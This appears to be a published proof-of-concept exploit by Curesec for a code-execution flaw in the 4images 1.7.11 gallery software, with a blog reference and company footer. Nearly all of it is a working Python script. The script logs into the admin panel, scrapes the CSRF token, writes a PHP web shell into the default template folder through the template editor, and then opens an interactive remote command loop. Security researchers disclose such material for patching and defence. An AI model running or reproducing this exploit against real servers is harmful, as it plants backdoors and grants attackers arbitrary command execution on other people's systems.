4images 1.7.11 Code Execution

`  
#!/usr/local/bin/python  
# Exploit for 4images 1.7.11 Code Execution vulnerability  
# An admin account is required to use this exploit  
# Curesec GmbH  
  
import sys  
import re  
import argparse  
import requests # requires requests lib  
  
parser = argparse.ArgumentParser()  
parser.add_argument("url", help="base url to vulnerable site")  
parser.add_argument("username", help="admin username")  
parser.add_argument("password", help="admin password")  
args = parser.parse_args()  
  
url = args.url  
username = args.username  
password = args.password  
  
loginPath = "/admin/index.php"  
fileManagerPath = "/admin/templates.php"  
  
shellFileName = "404.php"  
shellContent = "<?php passthru($_GET['x']); ?>"  
  
def login(requestSession, url, username, password):  
csrfRequest = requestSession.get(url)  
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)  
csrfToken = csrfTokenRegEx.group(1)  
  
postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}  
loginResult = requestSession.post(url, data = postData).text  
return "loginpassword" not in loginResult  
  
def upload(requestSession, url, fileName, fileContent):  
csrfRequest = requestSession.get(url)  
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)  
csrfToken = csrfTokenRegEx.group(1)  
  
postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}  
loginResult = requestSession.post(url, data = postData).text  
  
def runShell(url):  
print("enter command, or enter exit to quit.")  
command = raw_input("$ ")  
while "exit" not in command:  
print(requests.get(url + command).text)  
command = raw_input("$ ")  
  
requestSession = requests.session()  
  
if login(requestSession, url + loginPath, username, password):  
print("successful: login")  
else:  
exit("ERROR: Incorrect username or password")  
  
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)  
  
runShell(url + "/templates/default/" + shellFileName + "?x=")  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`